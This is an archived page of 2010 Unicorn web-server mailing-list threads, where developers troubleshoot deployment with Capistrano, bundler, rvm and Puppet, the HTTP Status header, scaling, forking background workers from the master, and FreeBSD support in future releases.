>> > have no problems accepting large requests (Rainbows! defaults the
>> > client_max_body_size to 1mb, just like nginx).
>>
>> It's part of the PUT request, I guess.
>>
>> > It could be Unicorn's internal (default 60s) timeout kicking
>> > in because puppet is slowly reading/generating the 2mb body.
>>
>> I raised the timeout first to 120, then 180 - and I continued to get
>> the 502 (with the logs as above)
>> When I raised it upto 240, puppetd complained:
>
> Interesting.  I'm not familiar with Puppet internals, but is there any
> valid reason it would be taking this long?
>
> Can you tell if the Unicorn worker is doing anything (using up CPU time
> in top) or just blocked on some socket connection to a database or DNS?
> (strace/truss will help).
>
> You should definitely talk to Puppet developers/users about why it's
> taking so long.  HTTP requests taking anywhere near 60s is an eternity,
> I wonder if your Puppet is somehow misconfigured.
>

Yes, puppet-server was mis-configured and went unnoticed. The reports
are supposed to be accepted by another URL and that had to be
configured appropriately.

Sorry for the false alarm.

-Naresh.
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 5%]

* Re: javascript disappears
  @ 2010-08-18  3:39  3%       ` Jimmy Soho
  0 siblings, 0 replies; 200+ results
From: Jimmy Soho @ 2010-08-18  3:39 UTC (permalink / raw)
  To: unicorn list

> In your Capistrano deploy tasks, do you create/update the current
> symlink before you send USR2?  You should have the symlink updated
> before sending USR2..

Yes I do.

Meanwhile I've been able to indeed reproduce the issue I was seeing if
I prune releases. This is what I do:

- ls /srv/app/releases shows only:

  /srv/app/releases/20100818022900

- stop unicorn
- start unicorn
- deploy new release (same code actually)
- unicorn now has a different PID, /proc/31761/cwd does point to the
latest release directory:

  /proc/31761/cwd -> /srv/app/releases/20100818024514

- refresh browser, ok, no issue.
- rm -Rf /srv/app/releases/20100818022900
- deploy another new release
- refresh browser: javascripts/base.js is missing

nothing in unicorn.stderr.log, but looking in unicorn.stdout.log it mentions:

  /srv/app/releases/20100818022900/Gemfile not found

The unicorn process PID hasn't changed, nor has proc/31761/cwd

My /srv/app/current dir now points to the latest release. Which I
guess is wrong as well, as unicorn failed to start with the latest
release; so it (= capistrano) needs to rollback somehow (which is a
different issue).

If I now peek in /proc/31761/environ then I notice these:

  GEM_HOME=/srv/app/releases/20100818022900/vendor/bundler_gems
  PATH=/srv/app/releases/20100818022900/vendor/bundler_gems/bin:[... etc.]
  GEM_PATH=/srv/app/releases/20100818022900/vendor/bundler_gems
  BUNDLE_GEMFILE=/srv/app/releases/20100818022900/Gemfile

which are all pointing to the working directory I pruned. Hence the
message about Gemfile not found I guess.

Any suggestions how / when to update those environment variables with
correct values?


> Other folks here may have more experience with Capistrano+Unicorn,
> maybe they have portable recipes they can share.

Maybe it's more a gem and/or bundler thing?  Though it seems like a
general issue to me that environment variables can have references to
old working directories, which need to be updated if you restart
Unicorn with USR2 all the time.  Is this something Unicorn could
possibly take care off?


Jimmy
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying


^ permalink raw reply	[relevance 3%]

* Re: running unicorn under rvm
  2010-08-17 22:37  4%   ` Joseph McDonald
@ 2010-08-18  1:08  0%     ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2010-08-18  1:08 UTC (permalink / raw)
  To: Joseph McDonald; +Cc: unicorn list

Joseph McDonald <superjoe@gmail.com> wrote:
> I'm sure I'm running the right version of unicorn.
> what's weird is if I remove the reference to TOPLEVEL_BINDING, it works, i.e.:
> 
>  host, port, set_listener, options, daemonize =
>                     eval("[ host, port, set_listener, options, daemonize ]")
> 
> works, it gets the right port from the config.ru file.

Hm... I'm stumped.  However, you're really encouraging me to pause other
projects, work on 2.0 and release it this week/weekend :)  I suppose
some of the crazier 2.0 stuff I proposed can wait until 3.x.

> my config.ru file looks like"
> #\ -w -p 4452
> require './mystuff'
> run Sinatra::Application
> 
> another strange thing:  I need to add the "./"  in front of mystuff,
> but when i'm not using rvm (rvm use system), I don't need to do that.

Odd... needing the './' feels like it's using Ruby 1.9.2 or later...
Can you print out RUBY_VERSION in there to be certain?

I just tried rvm for the first time with a fresh user/home directory on my
system and everything works as expected with 1.8.7 (it just picked p302, not
p299, but that shouldn't make a difference...).

> I'm curious if anyone else is using unicorn with rvm and not having
> this problem.  I'm guessing it's something weird with my system, but
> not sure.

If you have root on your machine, just try creating a new user and start
with a blank $HOME.  I often do that to narrow things down when
debugging/testing code and don't feel like going all the way with chroot
or VM.

-- 
Eric Wong
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying


^ permalink raw reply	[relevance 0%]

* Re: running unicorn under rvm
  @ 2010-08-17 22:37  4%   ` Joseph McDonald
  2010-08-18  1:08  0%     ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Joseph McDonald @ 2010-08-17 22:37 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn list

Thanks Eric, see below:

On Mon, Aug 16, 2010 at 8:52 PM, Eric Wong <normalperson@yhbt.net> wrote:
> Joseph McDonald <superjoe@gmail.com> wrote:
>> unicorn 1.1.2 runs fine under my system ruby, but when trying to run
>> it using rvm, I get:
>>
>>
>> % rvm use 1.8.7
>> info: Using ruby 1.8.7 p299
>>
>> % unicorn
>> /home/joe/.rvm/gems/ruby-1.8.7-p299/gems/unicorn-1.1.2/lib/unicorn/configurator.rb:494:in
>> `eval': undefined local variable or method `host' for main:Object
>> (NameError)
>
> Hi Joseph,
>
> Is there any chance you have an older "unicorn" executable script
> somewhere that gets exposed rvm switches the environment on you?  That's
> the only thing I can think of right now.

I'm sure I'm running the right version of unicorn.
what's weird is if I remove the reference to TOPLEVEL_BINDING, it works, i.e.:

 host, port, set_listener, options, daemonize =
                    eval("[ host, port, set_listener, options, daemonize ]")

works, it gets the right port from the config.ru file.

my config.ru file looks like"
#\ -w -p 4452
require './mystuff'
run Sinatra::Application

another strange thing:  I need to add the "./"  in front of mystuff,
but when i'm not using rvm (rvm use system), I don't need to do that.

I'm curious if anyone else is using unicorn with rvm and not having
this problem.  I'm guessing it's something weird with my system, but
not sure.

thanks,
-joe





>
>> line 494 looks like:
>>
>>  # XXX ugly as hell, WILL FIX in 2.x (along with Rainbows!/Zbatery)
>
> Yes, I still need to work on 2.x and clean up a lot of the
> ugly internal API bits :)
>
>
> --
> Eric Wong
>
> P.S.: At least nowadays I'm (finally) getting some experience
> developing/supporting applications using Unicorn and Rainbows! (or
> Zbatery).  Things like e4d0b226391948ef433f1d0135814315e4c48535 in
> unicorn.git are a direct result of that.
>
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying


^ permalink raw reply	[relevance 4%]

* Re: [ANN] unicorn 1.0.1 and 1.1.2 - fix rollbacks
  @ 2010-07-16  0:47  2%             ` Lawrence Pit
  0 siblings, 0 replies; 200+ results
From: Lawrence Pit @ 2010-07-16  0:47 UTC (permalink / raw)
  To: unicorn list


>> It appears unicorn rolls back by itself when it can't start the new master. Nice!
>>
>> Jamie also mentions to use the shared vendor/bundler_gems path.  Though I do use that in all my projects I'm not so sure it's wise to do when you can't afford any downtime.  I'll have to wait for unicorn v1.1.3 before I can test whether rolling back will indeed continue with unicorn v1.1.2 instead of v1.1.3 ;o
>>     
>
> Hi Lawrence, why does the shared vendor/bundler_gems cause you downtime? From not re-bundling during rollback?
>
> FWIW I made that recommendation because I ran into issues with unicorns not restarting correctly after running `cap deploy:cleanup`, since the `bundle exec` launches a binary with a path like /app/releases/201007125236/bin/unicorn, which goes missing after N deploys. I haven't tested if this applies to more recent versions
>
> Shared bundles are also significantly faster -- `bundle check || bundle install` is ~1s for me vs. several minutes to totally rebundle
>   

Hi Jamie, I see what you mean. I haven't tested this yet, so I don't 
know for sure if it could cause downtime. I also always use bundle check 
|| bundle install to get that time benefit.

My worry was indeed that it might pick a newer unicorn to restart 
workers for the old master. I guess that can/should be prevented by 
having an on_rollback in my capistrano bundler task.


What is the exact command you use to start unicorn?


What I see is this, I start with:

$ su -l deployer -c "cd /app/current ; bundle exec unicorn_rails -D -c 
/app/current/config/unicorn.rb"

My after_fork and before_exec methods output the ENV vars to the unicorn 
log. I see for example:

AFTER_FORK: VERSION 1
PATH=/app/releases/20100714054705/vendor/bundler_gems/bin:....
GEM_HOME=/app/releases/20100714054705/vendor/bundler_gems
GEM_PATH=/app/releases/20100714054705/vendor/bundler_gems:/app/releases/20100714054705/vendor/bundler_gems/bundler/gems
BUNDLE_GEMFILE=/app/releases/20100714054705/Gemfile

Note that /app/releases/20100714054705/vendor/bundler_gems is a symlink 
to /app/releases/shared/vendor/bundler_gems

When I deploy a new version, symlink /app/current to the new release 
directory, and send USR2 :

executing 
["/app/releases/20100714054705/vendor/bundler_gems/bin/unicorn_rails", 
"-D", "-E", "staging", "-c", "/app/current/config/unicorn.rb"] (in 
/app/releases/20100714055624)
BEFORE_EXEC: VERSION 1
PATH=/app/releases/20100714054705/vendor/bundler_gems/bin:....
GEM_HOME=/app/releases/20100714054705/vendor/bundler_gems
GEM_PATH=/app/releases/20100714054705/vendor/bundler_gems:/app/releases/20100714054705/vendor/bundler_gems/bundler/gems
BUNDLE_GEMFILE=/app/releases/20100714054705/Gemfile
I, [2010-07-15T23:31:47.765995 #23084]  INFO -- : inherited 
addr=/tmp/.unicorn_sock fd=3
I, [2010-07-15T23:31:47.766646 #23084]  INFO -- : Refreshing Gem list
/app/releases/20100714055624/.bundle/environment.rb:175: warning: 
already initialized constant ENV_LOADED
/app/releases/20100714055624/.bundle/environment.rb:176: warning: 
already initialized constant LOCKED_BY
/app/releases/20100714055624/.bundle/environment.rb:177: warning: 
already initialized constant FINGERPRINT
/app/releases/20100714055624/.bundle/environment.rb:178: warning: 
already initialized constant HOME
/app/releases/20100714055624/.bundle/environment.rb:179: warning: 
already initialized constant AUTOREQUIRES
/app/releases/20100714055624/.bundle/environment.rb:181: warning: 
already initialized constant SPECS
AFTER_FORK: VERSION 2
PATH=/app/releases/20100714054705/vendor/bundler_gems/bin:....
GEM_HOME=/app/releases/20100714055624/vendor/bundler_gems
GEM_PATH=/app/releases/20100714055624/vendor/bundler_gems:/app/releases/20100714055624/vendor/bundler_gems/bundler/gems
BUNDLE_GEMFILE=/app/releases/20100714054705/Gemfile


What you see here is that the new worker does have correct GEM_HOME and 
GEM_PATH values, but the PATH and BUNDLE_GEMFILE values are pointing to 
the old dir.

Are those bundler warnings something to worry about?

The BUNDLE_GEMFILE value is worrying I think. I haven't tested this, but 
I'm pretty sure when Bundler.setup is called within your app it will 
actually setup using the old Gemfile then. So that would mean you need 
to reset it somehow?  I don't see how at the moment...  should unicorn 
provide a method similar to +working_directory+ to help ensure the 
application always uses the "current" Gemfile (eg 
"/app/current/Gemfile") ?  Sound kind of strange unicorn should provide 
such a method, is there another way?

What about that PATH value?  What happens if 10 deployments later the 
dir /app/releases/20100714054705 is pruned? I tried. After removing that 
dir I could still send a HUP, but when I send a USR2 I get this:

/app/releases/20100714054705/vendor/bundler_gems/gems/unicorn-1.1.2/lib/unicorn.rb:573:in 
`exec': No such file or directory - 
app/releases/20100714054705/vendor/bundler_gems/bin/unicorn_rails 
(Errno::ENOENT)
        from 
/app/releases/20100714054705/vendor/bundler_gems/gems/unicorn-1.1.2/lib/unicorn.rb:573:in 
`reexec'


 > since the `bundle exec` launches a binary with a path like 
/app/releases/201007125236/bin/unicorn,
 > which goes missing after N deploys


That's what I'm seeing. How did using shared vendor/bundler_gems help 
you?  Because I'm starting with bundle exec using shared 
vendor/bundler_gems as well.




Cheers,
Lawrence
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying


^ permalink raw reply	[relevance 2%]

* Re: Purpose of "Status" header in HTTP responses?
  @ 2010-06-23  9:07  3% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2010-06-23  9:07 UTC (permalink / raw)
  To: unicorn list; +Cc: Craig Davey

Craig Davey <me@craigdavey.ca> wrote:
> Hi folks
> 
> On line #63 of unicorn/http_response.rb a "Status" header is written
> to the socket. A comment in the code explains that some broken clients
> require this header and unicorn generously accommodates them.
> 
> We’re having the opposite problem. One of our clients using Microsoft
> Windows and ASP haven’t been able to connect to our HTTP API since we
> moved it to unicorn from passenger. They receive the following error
> message when they try to connect to our servers:
> 
> msxml3.dll error '80072f78' server returned an invalid or unrecognized
> response

Hi Craig,

Interesting and strange...

Looking at lib/phusion_passenger/rack/request_handler.rb (blob ad22dfa)
line 94, they also set the Status: header, too (but just the numeric
code, no text).

You can try "proxy_hide_header Status;" in your nginx config
to suppress it.


Another theory: You are running nginx in front of Unicorn, right?

If not (but you really should be), the lack of a Server header may throw
off some clients...

I also don't ever want folks to be forced to reveal they use which
server they use for security concerns, so Unicorn won't ever force the
Server: header on you.  And since nginx overwrites any Server header
Unicorn would set, Unicorn won't bother, either.  However, it's easy to
setup Rack middleware to write anything you want in the Server header.

rainbows.git (unreleased) allows using the Rainbows::ServerToken
middleware, and if you really need it, it should be easy to port to
Unicorn:

  http://git.bogomips.org/cgit/rainbows.git/tree/lib/rainbows/server_token.rb

> Our client thinks this error is caused by the "Status" header that is
> added to responses by unicorn. We don’t know of any other instances
> where this header is causing problems so we’re pretty confused about
> why it’s a problem for them.

Passenger also adds X-Powered-By, but that's completely non-standard and
probably used to get around proxies (like nginx) that overwrite the
standard Server: header.  You can also make middleware (or your app) add
that header, too, and even go as far to make Unicorn pretend to be
Passenger :>

> Does anyone remember why this "Status" header was added to
> HttpResponse? Which broken clients was the change trying to
> accommodate?

I seem to recall some JavaScript libraries relied on it at some point,
and possibly some versions of Firebug.  Maybe some browser plugins do,
too.  Some folks here with more experience on client-side stuff ought
to chime in, since I generally stay away from GUI/DOM things.

However, even with my lack of JS experience (or because of) I realize
it's very easy to fall into the trap of writing JavaScript that relies
on the Status: header.  The Status: header has been with us as a
de-facto standard since the CGI days.  Older cgi.rb-based versions of
Rails set it, too.

-- 
Eric Wong
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 3%]

* Re: scaling unicorn
  @ 2010-06-22 18:57  4%         ` Jamie Wilkinson
  0 siblings, 0 replies; 200+ results
From: Jamie Wilkinson @ 2010-06-22 18:57 UTC (permalink / raw)
  To: unicorn list

>> Somewhat related -- I've been meaning to discuss the finer points of
>> backlog tuning.
>> 
>> I've been experimenting with the multi-server socket+TCP megaunicorn
>> configuration from your CDT:
>> http://rubyforge.org/pipermail/mongrel-unicorn/2009-September/000033.html

On Jun 22, 2010, at 11:03 AM, snacktime wrote:

> Seems like you would have some type of 'reserve'
> cluster for requests that hit the listen backlog, and when you start
> seeing too much traffic going to the reserve, you add more servers to
> your main pool.  How else would you manage the configuration for
> something like this when you are working with 100 - 200 servers?  You
> can't be changing the nginx configs every time you add servers, that's
> just not practical.

We are using chef for machine configuration which makes these kinds of  numbers doable
http://wiki.opscode.com/display/chef/Home

I would love to see a nginx module for distributed configuration mgmnt

Right now we are running 6 frontend machines, 4 in use & 2 in reserve like you described. We are doing about 5000rpm with this, almost all dynamic. 10-30% of requests might be 'slow' (1+s) depending on usage patterns. 

To measure health I am using munin to watch system load, nginx requests & nginx errors. In this configuration 502 Bad Gateways from frontend nginx indicate a busy unicorn socket & thus a handoff of the request to the backups. Then we measure the rails production.log for request counts + speed on each server as well as using NewRelic RPM

monit also emails us when 502s show up. 
In theory monit could  be automatically spinning up another backup server, provisioning it using chef, then reprovisioning the rest of the cluster to start handing over traffic. Alternately the new server could just act as backup for the one overloaded machine, which could make isolating performance issues easier.

-jamie

_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying


^ permalink raw reply	[relevance 4%]

* Re: Forking off the unicorn master process to create a background worker
  @ 2010-06-16  0:06  4%         ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2010-06-16  0:06 UTC (permalink / raw)
  To: Russell Branca; +Cc: unicorn list

Russell Branca <chewbranca@gmail.com> wrote:
> On Tue, Jun 15, 2010 at 3:14 PM, Eric Wong <normalperson@yhbt.net> wrote:
> > Russell Branca <chewbranca@gmail.com> wrote:
> >> Hello Eric,
> >>
> >> Sorry for the delayed response, with the combination of being sick and
> >> heading out of town for a while, this project got put on the
> >> backburner. I really appreciate your response and think its a clean
> >> solution for what I'm trying to do. I've started back in getting the
> >> job queue working this week, and will hopefully have a working
> >> solution in the next day or two. A little more information about what
> >> I'm doing, I'm trying to create a centralized resque job queue server
> >> that each of the different applications can queue work into, so I'll
> >> be using redis behind resque for storing jobs and what not, which
> >> brings me an area I'm not sure of the best approach on. So when we hit
> >> the job queue endpoint in the rack app, it spawns the new worker, and
> >> then immediately returns the 200 ok started background job message,
> >> which cuts off communication back to the job queue. My plan is to save
> >> a status message of the result of the background task into redis, and
> >> have resque check that to verify the task was successful. Is there a
> >> better approach for returning the resulting status code with unicorn,
> >> or is this a reasonable approach? Thanks again for your help.
> >
> > Hi Russell, please don't top post, thanks.
> >
> > If you already have a queue server (and presumably a standalone app
> > processing the queue), I would probably forgo the background Unicorn
> > worker entirely.
> >
> > Based on my ancient (mid-2000s) knowledge of user-facing web
> > applications: the application should queue the job, return 200, and have
> > HTML meta refresh to constantly reload the page every few seconds.
> >
> > Hitting the reload endpoint would check the database (Redis in this
> > case) for completion, and return a new HTML page to stop the meta
> > refresh loop.
> >
> > This means you're no longer keeping a single Unicorn worker idle and
> > wasting it.  Nowadays you could do it with long-polling on
> > Rainbows!/Thin/Zbatery, too, but long-polling is less reliable for
> > people switching between WiFi access points.  The meta refresh method
> > can be a waste of power/bandwidth on the client side if the background
> > job takes a long time, though.
> >
> > I'm familiar at all with Resque or Redis, but I suspect other folks
> > on this mailing list should be able to help you flesh out the details.
> 
> Hi Eric,
> 
> I have a queue server, but I don't have a standalone app processing
> the jobs, because I have a large number of stand alone applications on
> a single server. Right now I've got 12 separate apps running, so if I
> wanted to have a standalone app for each, that would be 12 additional
> applications in memory for handling background jobs. The whole reason
> I want to go with the unicorn worker approach for handling background
> jobs, is so I can fork off the master process as needed, avoid the
> spawning time for a normal rails instance, and only use workers as
> needed. This way I can have just a few workers running at any given
> time, rather than 1 worker for each app. The number of apps is only
> going to increase, but I want to keep the worker pool a constant. I'll
> probably just update status of completion with redis, these jobs won't
> be run by users, this is all background stuff like sending
> notifications, data analysis, feed parsing, etc etc, so I'm planning
> on just having resque initiate a request directly, and then use
> unicorn to process the task in the background.

Ah, so I guess it's a single queue server but multiple queues?  I
guess thats where I got confused with your description.

> I didn't exactly follow what you meant when you were talking about a
> unicorn worker being idle, from the example config.ru you responded
> with earlier on, it looks like I can just spawn a new worker that will
> be outside of the normal worker pool to handle the job. I'm pretty
> sure this will work, I was curious about the best approach for
> returning completion status, but I think just having the worker record
> its status and exit is better than having long polling connections
> open between the job queue and the new unicorn worker.

Yes, having the fork as I made in the example should work.  I haven't
tested it, of course :)  My instincts tell me recording the status and
exiting ASAP is better because it uses less memory.

You should test and experiment with it either way.  You know your apps,
requirements, and Redis/Resque far better than I do :)  Consider
software an evolutionary process, so whatever the "best approach" may
be, another one can usurp it eventually or be completely wrong in a
slightly different setting :)

-- 
Eric Wong
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying


^ permalink raw reply	[relevance 4%]

* Re: Forking off the unicorn master process to create a background  worker
  2010-05-26 21:05  0% ` Eric Wong
@ 2010-06-15 17:55  0%   ` Russell Branca
    0 siblings, 1 reply; 200+ results
From: Russell Branca @ 2010-06-15 17:55 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn list

Hello Eric,


Sorry for the delayed response, with the combination of being sick and
heading out of town for a while, this project got put on the
backburner. I really appreciate your response and think its a clean
solution for what I'm trying to do. I've started back in getting the
job queue working this week, and will hopefully have a working
solution in the next day or two. A little more information about what
I'm doing, I'm trying to create a centralized resque job queue server
that each of the different applications can queue work into, so I'll
be using redis behind resque for storing jobs and what not, which
brings me an area I'm not sure of the best approach on. So when we hit
the job queue endpoint in the rack app, it spawns the new worker, and
then immediately returns the 200 ok started background job message,
which cuts off communication back to the job queue. My plan is to save
a status message of the result of the background task into redis, and
have resque check that to verify the task was successful. Is there a
better approach for returning the resulting status code with unicorn,
or is this a reasonable approach? Thanks again for your help.


-Russell

On Wed, May 26, 2010 at 2:05 PM, Eric Wong <normalperson@yhbt.net> wrote:
> Russell Branca <chewbranca@gmail.com> wrote:
>> Hello,
>>
>> I'm trying to find an efficient way to create a new instance of a
>> rails application to perform some background tasks without having to
>> load up the entire rails stack every time, so I figured forking off
>> the master process would be a good way to go. Now I can easily just
>> increment the worker count and then send a web request in, but the new
>> worker would be part of the main worker pool, so in the time between
>> spawning a new worker and sending the request, another request could
>> have come in and snagged that worker. Is it possible to create a new
>> worker and not have it enter the main worker pool so I could access it
>> directly?
>
> Hi Russell,
>
> You could try having an endpoint in your webapp (with authentication, or
> have it reject env['REMOTE_ADDR'] != '127.0.0.1') that runs the
> background task for you.  Since it's a background app, you should
> probably fork + Process.setsid + fork (or Process.daemon in 1.9), and
> return an HTTP response immediately so your app can serve other
> requests.
>
> The following example should be enough to get you started (totally
> untested)
>
> ------------ config.ru -------------
> require 'rack/lobster'
>
> map "/.seekrit_endpoint" do
>  use Rack::ContentLength
>  use Rack::ContentType, 'text/plain'
>  run(lambda { |env|
>    return [ 403, {}, [] ] if env['REMOTE_ADDR'] != '127.0.0.1'
>    pid = fork
>    if pid
>      Process.waitpid(pid)
>
>      # cheap way to avoid unintentional fd sharing with our children,
>      # this causes the current Unicorn worker to exit after sending
>      # the response:
>      # Otherwise you'd have to be careful to disconnect+reconnect
>      # databases/memcached/redis/whatever (in both the parent and
>      # child) to avoid unintentional sharing that'll lead to headaches
>      Process.kill(:QUIT, $$)
>
>      [ 200, {}, [ "started background process\n" ] ]
>    else
>      # child, daemonize it so the unicorn master won't need to
>      # reap it (that's the job of init)
>      Process.setsid
>      exit if fork
>
>      begin
>        # run your background code here instead of sleeping
>        sleep 5
>        env["rack.logger"].info "done sleeping"
>      rescue => e
>        env["rack.logger"].error(e.inspect)
>      end
>      # make sure we don't enter the normal response cycle back in the
>      # worker...
>      exit!(0)
>    end
>  })
> end
>
> map "/" do
>  run Rack::Lobster.new
> end
>
>> I know this is not your typical use case for unicorn, and you're
>> probably thinking there is a lot better ways to do this, however, I
>> currently have a rails framework that powers a handful of standalone
>> applications on a server with limited resources, and I'm trying to
>> make a centralized queue that all the applications use, so the queue
>> needs to be able to spawn a new worker for each of the applications
>> efficiently, and incrementing/decrementing worker counts in unicorn is
>> the most efficient way I've found to spawn a new rails instance.
>
> Yeah, it's definitely an odd case and there are ways to shoot yourself
> in the foot with it (especially with unintentional fd sharing), but Ruby
> exposes all the Unix process management goodies better than most
> languages (probably better than anything else I've used).
>
>> Any help, suggestions or insight into this would be greatly appreciated.
>
> Let us know how it goes :)
>
> --
> Eric Wong
>
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying


^ permalink raw reply	[relevance 0%]

* Re: Unicorn future plans
  2010-06-14 20:58  3% ` John-Paul Bader
@ 2010-06-14 22:10  0%   ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2010-06-14 22:10 UTC (permalink / raw)
  To: unicorn list

John-Paul Bader <hukl@berlin.ccc.de> wrote:
> Hey, 
> 
> your plans sound great except for ignoring FreeBSD ;)
> 
> Seriously many many Servers, including many which I administrate run
> on FreeBSD and they do so very well. I'm not very familiar with the
> internals of the FreeBSD Kernel but I can assure you that it runs
> perfectly on 8 and 16 core machines and I would extremely happy if I
> could continue to use unicorn on them.

Hi John-Paul,

Reread my post carefully, not much is changing for 8-16 core users.
FreeBSD and SMP will continue to be supported.  I wasn't referring
to SMP at all when I was talking about Linux-only bits.

> It should be easier to maintain a FreeBSD version as they (FreeBSD
> developers) tend to aim for more consistency across releases than
> Linux. You said once that you don't run any BSD machines but I'd be
> happy to offer you access to one of my BSD servers for testing.

Thanks for the offer.  I'll keep it in mind if I need it again.

> Furthermore since Mac OS X and FreeBSD share many features like kqueue
> and many Ruby developers are running macs it would make even more
> sense to at least care about BSD even if its not you primary platform. 

I know, I've fixed some things on OSX platforms via FreeBSD (OSX scares
me with its GUI-ness).  Keep in mind kqueue (and epoll) are worthless
for Unicorn itself since Unicorn only handles one client at a time.

However, Rainbows! can already use kqueue/epoll with EventMachine and
Rev.

> I don't want to start a flame war or say that one OS is better than
> another. Linux is certainly great but so is FreeBSD. For the SMP part
> I recommend the following page on freebsd.org:

Again, I wasn't talking about SMP at all.   SMP works fine on current
Unicorn and mid-sized servers.  When going to more cores, SMP itself
is a bottleneck, not the kernel.

With Unicorn 2.x, I'm targeting NUMA hardware that isn't available in
commodity servers yet.  Currently, NUMA makes _zero_ sense in web
application servers, but in case things change in a few years, we'll be
ready.

It may be a chicken-and-egg problem, too.  Hardware manufacturers are
slow to commoditize NUMA because a good chunk of software can't even
utilize SMP effectively :)

> To conclude I can only say that I'm running unicorn on several FreeBSD
> hosts and so far I couldn't be happier with it. As stated before, I'd
> be more than happy to continue using that setup.

Again, don't worry :)  You'll be able to continue using everything
as-is.

> Kindest regards and thanks for all you efforts,

No problem.  Please don't top post in the future.

-- 
Eric Wong
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying


^ permalink raw reply	[relevance 0%]

* Re: Unicorn future plans
  @ 2010-06-14 20:58  3% ` John-Paul Bader
  2010-06-14 22:10  0%   ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: John-Paul Bader @ 2010-06-14 20:58 UTC (permalink / raw)
  To: unicorn list

Hey, 

your plans sound great except for ignoring FreeBSD ;)

Seriously many many Servers, including many which I administrate run on FreeBSD and they do so very well. I'm not very familiar with the internals of the FreeBSD Kernel but I can assure you that it runs perfectly on 8 and 16 core machines and I would extremely happy if I could continue to use unicorn on them.

It should be easier to maintain a FreeBSD version as they (FreeBSD developers) tend to aim for more consistency across releases than Linux. You said once that you don't run any BSD machines but I'd be happy to offer you access to one of my BSD servers for testing.

Furthermore since Mac OS X and FreeBSD share many features like kqueue and many Ruby developers are running macs it would make even more sense to at least care about BSD even if its not you primary platform. 

I don't want to start a flame war or say that one OS is better than another. Linux is certainly great but so is FreeBSD. For the SMP part I recommend the following page on freebsd.org:

http://www.freebsd.org/smp/

And maybe specifically:

http://www.freebsd.org/smp/#resources

To conclude I can only say that I'm running unicorn on several FreeBSD hosts and so far I couldn't be happier with it. As stated before, I'd be more than happy to continue using that setup.

Kindest regards and thanks for all you efforts,

John


On 14.06.2010, at 21:46, Eric Wong wrote:

> Hi all,
> 
> Some of you are wondering about the future of the project, especially
> since we're nearing a 1.0 release.
> 
> == 1.x - bugfixes and Rack-compatibility synchronization
> 
> The 1.x series will focus mainly on bug fixes and compatibility with
> Rack as it evolves.
> 
> If Rack drops the rewindability requirement of "rack.input", Unicorn
> will follow ASAP and allow TeeInput to be optional middleware with
> newer Rack versions.
> 
> Rubinius should be fully-supported soon, as it's already mostly working
> except for a few corner-case things Rubinius doesn't implement (issues
> filed on their bug tracker).
> 
> == 2.x - the fun and crazy stuff
> 
> First off, there'll be internal API cleanups + sync with
> Rainbows!/Zbatery This won't be user visible, but it'll be less ugly
> inside.
> 
> === Scalability improvements
> 
> I don't know if we'll see hundreds/thousands of CPUs in a single
> application server any time soon, but 2.x will have internal changes
> that'll make us more ready for that.  It could be 5-10 years before
> massively multi-core machines are viable for web apps, but it'd
> certainly be fun to max out Unicorn on those.
> 
> I'll be less shy about sacrificing portability for massive scalability.
> Correct me if I'm wrong, but Linux is the only Free kernel that scales
> to monster multicore machines right now, so I'll primarily focus on
> working with features in Linux.
> 
> Currently, 8-16 cores seems to be the sweet spot (and has been for a
> while), and present-day Unicorn handles that fine as-is.
> 
> === Features (for Rainbows!, mainly)
> 
> IPv6 support and SSL will come, too.   These features will mainly be to
> support Rainbows!, though some LANs could benefit from those, too.  I'll
> have to review the MRI code for those, but I'm leaning towards only
> these new features under 1.9.2+.
> 
> Multi-VM (MVM, Ruby 1.9 experimental branch) support will probably
> happen only in Rainbows! rather than Unicorn.  A true fork() is still
> safer in the event of a crash (but less memory-efficient).
> 
> == Miscellaneous
> 
> I have no plans to provide commercial support, but I'll continue
> offering free support on the mailing list (or private email if you're
> shy).
> 
> As some of you may have noticed; I don't endorse commercial products or
> services at all.  This won't change.  However, there will probably be
> more commercial support available from 3rd parties after a 1.0 release.
> 
> 
> Thanks for reading!
> 
> -- 
> Eric Wong
> _______________________________________________
> Unicorn mailing list - mongrel-unicorn@rubyforge.org
> http://rubyforge.org/mailman/listinfo/mongrel-unicorn
> Do not quote signatures (like this one) or top post when replying
> 

_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying


^ permalink raw reply	[relevance 3%]

* Re: unicorn failing to start
  2010-05-28 18:49  4% ` Eric Wong
